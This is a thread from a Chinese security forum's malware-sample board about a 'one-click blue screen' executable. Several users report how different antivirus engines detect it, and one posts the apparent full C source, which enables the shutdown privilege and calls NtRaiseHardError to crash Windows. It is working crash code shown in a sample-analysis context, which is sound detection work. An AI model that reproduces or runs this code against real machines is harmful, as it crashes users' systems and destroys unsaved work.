收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 [恶意文件]一键蓝屏
1234下一页
返回列表 发新帖
楼主: UNknownOoo
 收起左侧

[病毒样本] [恶意文件]一键蓝屏

  [复制链接]
anthonyqian
发表于 2022-5-1 14:43:27 | 显示全部楼层
本帖最后由 anthonyqian 于 2022-5-1 16:13 编辑

卡巴斯基

The detection will be added in the next update:
BSOD.exe - HackTool.Win64.Agent.hs

ESET

Thank you for your submission.
The detection for this threat will be included in the next update of detection engine, expected version: 25196.

_________.exe - Win64/Agent.BHV trojan
回复

举报

xiaobao233
头像被屏蔽
发表于 2022-5-1 14:51:57 | 显示全部楼层
火绒miss
回复

举报

846472713
发表于 2022-5-1 18:22:37 | 显示全部楼层
金山 & QQ & G DATA 未报
回复

举报

aboringman
发表于 2022-5-1 21:33:03 | 显示全部楼层
诺顿:WS.Reputation.1(下载智能分析)

双击蓝屏
回复

举报

wowocock
发表于 2022-5-1 21:45:37 | 显示全部楼层
网上随便抄的代码吧,。
#include <Windows.h>
#include "NTHeaders.h"

HINSTANCE hInst;                                                                // 当前实例


typedef UINT (CALLBACK* NTRAISEHARDERROR)(NTSTATUS, ULONG, PUNICODE_STRING, PVOID,HARDERROR_RESPONSE_OPTION, PHARDERROR_RESPONSE);
typedef UINT (CALLBACK* RTLADJUSTPRIVILEGE)(ULONG, BOOL, BOOL, PINT);

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
        HINSTANCE hDLL = LoadLibrary(TEXT("ntdll.dll"));
        NTRAISEHARDERROR NtRaiseHardError;
        RTLADJUSTPRIVILEGE RtlAdjustPrivilege;
        int nEn = 0;
        HARDERROR_RESPONSE reResponse;
        if (hDLL != NULL)
        {
                NtRaiseHardError = (NTRAISEHARDERROR)GetProcAddress(hDLL, "NtRaiseHardError");
                RtlAdjustPrivilege = (RTLADJUSTPRIVILEGE)GetProcAddress(hDLL, "RtlAdjustPrivilege");
                if (!NtRaiseHardError)
                {
                        // handle the error
                        FreeLibrary(hDLL);
                        return 0;
                }
                if (!RtlAdjustPrivilege)
                {
                        // handle the error
                        FreeLibrary(hDLL);
                        return 0;
                }
                RtlAdjustPrivilege(0x13, TRUE, FALSE, &nEn);//0x13 = SeShutdownPrivilege
                NtRaiseHardError(0xC000021A,0,0,0,OptionShutdownSystem,&reResponse);
        }
        return 0;
}
回复

举报

UNknownOoo
 楼主| 发表于 2022-5-1 21:48:58 | 显示全部楼层
wowocock 发表于 2022-5-1 21:45
网上随便抄的代码吧,。
#include
#include "NTHeaders.h"

来源:qq群
回复

举报

smtxsmshsa
发表于 2022-5-2 09:06:55 | 显示全部楼层
没有名字ssss 发表于 2022-5-1 10:44
恶意文件(错误
一键摸鱼(正确

这可太草了
回复

举报

smtxsmshsa
发表于 2022-5-2 09:08:26 | 显示全部楼层
wowocock 发表于 2022-5-1 21:45
网上随便抄的代码吧,。
#include
#include "NTHeaders.h"

所以说360能拦截吗,我先用实体机作死
回复

举报

smtxsmshsa
发表于 2022-5-2 09:08:51 | 显示全部楼层
wowocock 发表于 2022-5-1 21:45
网上随便抄的代码吧,。
#include
#include "NTHeaders.h"

我的电脑带不动虚拟机
回复

举报

mjy
发表于 2022-5-2 18:42:36 | 显示全部楼层
火绒
病毒名称:Trojan/Generic!B424A4CC320FA077
病毒ID:B424A4CC320FA077
病毒路径:C:\Users\zf\Downloads\1\无需管理员一键蓝屏.exe
操作类型:修改
操作结果:已处理

进程ID:9616
操作进程:C:\Windows\explorer.exe
操作进程命令行:C:\WINDOWS\Explorer.EXE
父进程:C:\Windows\System32\userinit.exe
回复

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-6 16:14 , Processed in 0.108760 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表